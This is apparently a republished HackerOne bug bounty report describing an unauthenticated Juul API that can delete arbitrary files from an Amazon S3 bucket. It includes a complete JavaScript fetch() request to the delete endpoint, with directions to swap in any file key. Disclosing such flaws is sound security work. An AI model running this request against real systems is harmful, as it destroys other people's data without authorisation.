Celebrities

Delete any file from amazon storage JUUL

Here's how I could delete any file from amazon bucket of juul.

Posted  863 Views updated 4 years ago

1. Report submitted

Here's full report that I submitted to Juul program at hackerone

Summary:

Hi, I was able to delete any file from Juul amazon aws storage. The AWS with bucket tfiler is owned by juul and I can use juul unauthenticated API to delete any file from it.

Steps To Reproduce:

  1. Find a file.( in my case https://s3.amazonaws.com/tfiler/1585597526/JeYLFENz7U.jpg)
  2. Run javascript console and execute the following code fetch("https://switchnetwork.juul.com/fbcontests/deleteImageFromS3", {"credentials":"include","headers":{"accept":"application/json, text/javascript, */*; q=0.01","accept-language":"en-US,en;q=0.9","content-type":"application/x-www-form-urlencoded; charset=UTF-8","sec-fetch-dest":"empty","sec-fetch-mode":"cors","sec-fetch-site":"same-origin","x-requested-with":"XMLHttpRequest"},"referrer":"https://switchnetwork.juul.com/entryregister/SwitchNetworkCampaign","referrerPolicy":"no-referrer-when-downgrade","body":"key=1585597662/0Cwcuhq28s.jpeg","method":"POST","mode":"cors"});

Here on body:key=XXX is a path of file I want to delete.

 

Impact

Deleting file from storage, could delete important file.

juul file delete

Your reaction?

0
LOL
0
LOVED
0
PURE
0
AW
0
FUNNY
0
BAD!
1
EEW
0
OMG!
0
ANGRY

Stay in contact




More lists

News
Open Redirect Alibaba
20, Jun 2021 03:57 PM
News
I hacked several accounts from several sites just using VPN
26, Jan 2020 09:16 PM
News
Admin account take-over leading to RCE, XSS and more
14, Sep 2022 10:39 AM
News
Reset Password Hack
20, Jun 2021 03:42 PM